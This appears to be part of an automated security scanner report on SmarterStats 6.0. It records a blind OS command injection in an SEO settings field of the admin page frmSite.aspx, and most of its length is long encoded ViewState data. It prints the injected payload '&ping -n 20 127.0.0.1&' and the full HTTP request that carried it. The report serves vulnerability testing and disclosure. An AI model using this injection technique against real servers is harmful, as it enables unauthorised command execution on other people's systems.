MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2F%2F%2F%2F5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2F%2F%2F%2F%2FP%2F%2F%2FwYHAAAABFRleHQKAfj%2F%2F%2F%2F8%2F%2F%2F%2FBgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BMb2dPcHRpb25zAfX%2F%2F%2F%2F8%2F%2F%2F%2FBgwAAAAIU2VsZWN0ZWQIAQAB8%2F%2F%2F%2F%2Fz%2F%2F%2F8GDgAAAApQYWdlVmlld0lEBg8AAAANTG9nT3B0aW9uc1RhYgtkBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WGQUkY3RsMDAkTVBIJGNoa1Nlb0VuYWJsZWRfU2V0dGluZ0NoZWNrBShjdGwwMCRNUEgkY2hrU3RyaXBBZnRlclNlbWlfU2V0dGluZ0NoZWNrBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDAFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMQVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDMFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkNAVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ1BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDYFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkNwVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ4BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDkFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTAFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTEFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTIFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTMFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTQFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTUFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTYFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTcFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTgFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTkFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMjAFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMjEFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMjEFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW0xDzLWCwABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAIQE9wdGlvbnMB9f%2F%2F%2F%2Fz%2F%2F%2F8GDAAAAAhTZWxlY3RlZAgBAAHz%2F%2F%2F%2F%2FP%2F%2F%2FwYOAAAAClBhZ2VWaWV3SUQGDwAAAApPcHRpb25zVGFiC2QFGWN0bDAwJE1QSCRQYWdlSWRlbnRpZmllcjEPBSA2NzA2YjYxZDhmYjg0MDhkYjBiZDdkYWY5OTU2ZTNlY2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW03DzLaCwABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAKQExvZ1N0YXR1cwH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAADExvZ1N0YXR1c1RhYgtkX5dB0MWxfpOHdZB%2BIBMIEdqpxe094wua6ZwWPljnYkU%3D&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:06:07 GMT
Content-Length: 0


1.5. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter appears to be vulnerable to OS command injection attacks. It is possible to use the ampersand character (&) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload %26ping%20-n%2020%20127.0.0.1%26 was submitted in the ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter. The application timed out when responding to the request, indicating that the injected command caused a time delay.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=
Content-Length: 30100

ctl00%24ScriptManager1=ctl00%24MPH%24UpdatePanel5%7Cctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTTARGET=ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTYwMDgwNjA1Nw8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWDAICD2QWAgIBDxYCHgdWaXNpYmxlaGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsfAmhkAgYPFgIfAmhkAgcPZBYCZg9kFgICAQ8WAh8CaBYCAgEPFgIeBFRleHRlZAIID2QWAgIBD2QWAgIBD2QWAmYPZBYCAgEPZBYCAgQPFgIfAmhkAgkPZBYEAgEPZBYCAgMPFgIfBAUHTWVzc2FnZWQCAw9kFgJmD2QWAgIHD2QWCAICD2QWBgIBD2QWDmYPZBYCAgEPZBYCAgIPDxYCHwQFCGhveXQubmV0ZGQCAg8PFgIeCl9fcmVhZE9ubHlnZBYCAgEPZBYCAgIPDxYCHwQFATFkZAIDD2QWAgIBD2QWBGYPEGQPFgFmFgEQBQlsb2NhbGhvc3QFATFnZGQCAg8PFgIfBAUJbG9jYWxob3N0ZGQCBA9kFgICAQ9kFgJmDxBkEBUDB1N0YXJ0ZWQGUGF1c2VkCERpc2FibGVkFQMFc3RhcnQGcGF1c2VkCGRpc2FibGVkFCsDA2dnZ2RkAgUPZBYEZg8PFgYeCENzc0NsYXNzBQxJbmRlbnQgRml4ZWQfBAUPU21hcnRlckxvZyBQYXRoHgRfIVNCAgJkZAIBDw8WBB8GBQggU2V0dGluZx8HAgJkZAIGDw8WAh8FZ2QWAgIBD2QWBGYPEGQQFVcoKEdNVC0xMjowMCkgSW50ZXJuYXRpb25hbCBEYXRlIExpbmUgV2VzdCAoR01ULTExOjAwKSBNaWR3YXkgSXNsYW5kLCBTYW1vYRIoR01ULTEwOjAwKSBIYXdhaWkSKEdNVC0wOTowMCkgQWxhc2thJChHTVQtMDg6MDApIFRpanVhbmEsIEJhamEgQ2FsaWZvcm5pYSYoR01ULTA4OjAwKSBQYWNpZmljIFRpbWUgKFVTICYgQ2FuYWRhKS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBOZXcnKEdNVC0wNzowMCkgTW91bnRhaW4gVGltZSAoVVMgJiBDYW5hZGEpEyhHTVQtMDc6MDApIEFyaXpvbmEtKEdNVC0wNzowMCkgQ2hpaHVhaHVhLCBMYSBQYXosIE1hemF0bGFuIC0gT2xkGChHTVQtMDY6MDApIFNhc2thdGNoZXdhbjUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE9sZCYoR01ULTA2OjAwKSBDZW50cmFsIFRpbWUgKFVTICYgQ2FuYWRhKTUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE5ldxsoR01ULTA2OjAwKSBDZW50cmFsIEFtZXJpY2EmKEdNVC0wNTowMCkgRWFzdGVybiBUaW1lIChVUyAmIENhbmFkYSkaKEdNVC0wNTowMCkgSW5kaWFuYSAoRWFzdCkrKEdNVC0wNTowMCkgQm9nb3RhLCBMaW1hLCBRdWl0bywgUmlvIEJyYW5jbxMoR01ULTA0OjMwKSBDYXJhY2FzEihHTVQtMDQ6MDApIE1hbmF1cyIoR01ULTA0OjAwKSBBdGxhbnRpYyBUaW1lIChDYW5hZGEpEihHTVQtMDQ6MDApIExhIFBhehQoR01ULTA0OjAwKSBTYW50aWFnbxgoR01ULTAzOjMwKSBOZXdmb3VuZGxhbmQkKEdNVC0wMzowMCkgQnVlbm9zIEFpcmVzLCBHZW9yZ2V0b3duFShHTVQtMDM6MDApIEdyZWVubGFuZBQoR01ULTAzOjAwKSBCcmFzaWxpYRYoR01ULTAzOjAwKSBNb250ZXZpZGVvGChHTVQtMDI6MDApIE1pZC1BdGxhbnRpYxIoR01ULTAxOjAwKSBBem9yZXMaKEdNVC0wMTowMCkgQ2FwZSBWZXJkZSBJcy4lKEdNVCkgQ2FzYWJsYW5jYSwgTW9ucm92aWEsIFJleWtqYXZpaz0oR01UKSBHcmVlbndpY2ggTWVhbiBUaW1lIDogRHVibGluLCBFZGluYnVyZ2gsIExpc2JvbiwgTG9uZG9uPShHTVQrMDE6MDApIEJlbGdyYWRlLCBCcmF0aXNsYXZhLCBCdWRhcGVzdCwgTGp1YmxqYW5hLCBQcmFndWUsKEdNVCswMTowMCkgU2FyYWpldm8sIFNrb3BqZSwgV2Fyc2F3LCBaYWdyZWIvKEdNVCswMTowMCkgQnJ1c3NlbHMsIENvcGVuaGFnZW4sIE1hZHJpZCwgUGF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1AzIwMwMyMDcDMjA1AzIyNQMyMTADMjI3AzIyMAMyMTUDMjQwAzIzMAMyMzUDMjUwAzI0NQMyNzUDMjU1AzI3MAMyNjADMjY1AzI4MAMyODUDMjkwAzMwMBQrA1dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dkZAICDw8WAh8EBSYoR01ULTA2OjAwKSBDZW50cmFsIFRpbWUgKFVTICYgQ2FuYWRhKWRkAgcPZBYCAgEPZBYCZg8QZBAVAghOZXcgVXNlcgdob3l0bmV0FQIAB2hveXRuZXQUKwMCZ2cWAQIBZAIDDw8WAh8CaGQWBGYPZBYCAgEPZBYEZg8PFgIfBGVkZAICDw8WAh8EZWRkAgEPZBYCAgEPZBYCAgIPDxYCHwRlZGQCBQ9kFgJmD2QWAgIBD2QWAmYPEA8WAh4HQ2hlY2tlZGdkZGRkAgQPZBYCAgEPZBYOZg9kFgICAQ9kFgRmDxBkEBUCFkxvY2FsIFBhdGggb3IgVU5DIFBhdGgDRlRQFQIFTG9jYWwDRlRQFCsDAmdnFgFmZAICDw8WAh8EBRZMb2NhbCBQYXRoIG9yIFVOQyBQYXRoZGQCAQ9kFgICAQ9kFgJmDxBkEBUHFklJUyAtIFczQ2V4IExvZyBGb3JtYXQeSUlTIC0gTWljcm9zb2Z0IElJUyBMb2cgRm9ybWF0HElJUyAtIE5DU0EgQ29tbW9uIExvZyBGb3JtYXQaQXBhY2hlIC0gQ29tbW9uIExvZyBGb3JtYXQhQXBhY2hlIC0gTkNTQSBFeHRlbmRlZCBMb2cgRm9ybWF0G0lQbGFuZXQgLSBDb21tb24gTG9nIEZvcm1hdBlPdGhlciAtIENvbW1vbiBMb2cgRm9ybWF0FQcFVzNDZXgDSUlTBE5DU0EJQXBhY2hlQ0xGDEFwYWNoZU5DU0FFeApJUGxhbmV0Q0xGA0NMRhQrAwdnZ2dnZ2dnZGQCAg9kFgICAQ9kFgJmDxBkEBUlDE5ldmVyIERlbGV0ZRVEZWxldGUgYWZ0ZXIgMSBtb250aHMVRGVsZXRlIGFmdGVyIDIgbW9udGhzFURlbGV0ZSBhZnRlciAzIG1vbnRocxVEZWxldGUgYWZ0ZXIgNCBtb250aHMVRGVsZXRlIGFmdGVyIDUgbW9udGhzFURlbGV0ZSBhZnRlciA2IG1vbnRocxVEZWxldGUgYWZ0ZXIgNyBtb250aHMVRGVsZXRlIGFmdGVyIDggbW9udGhzFURlbGV0ZSBhZnRlciA5IG1vbnRocxZEZWxldGUgYWZ0ZXIgMTAgbW9udGhzFkRlbGV0ZSBhZnRlciAxM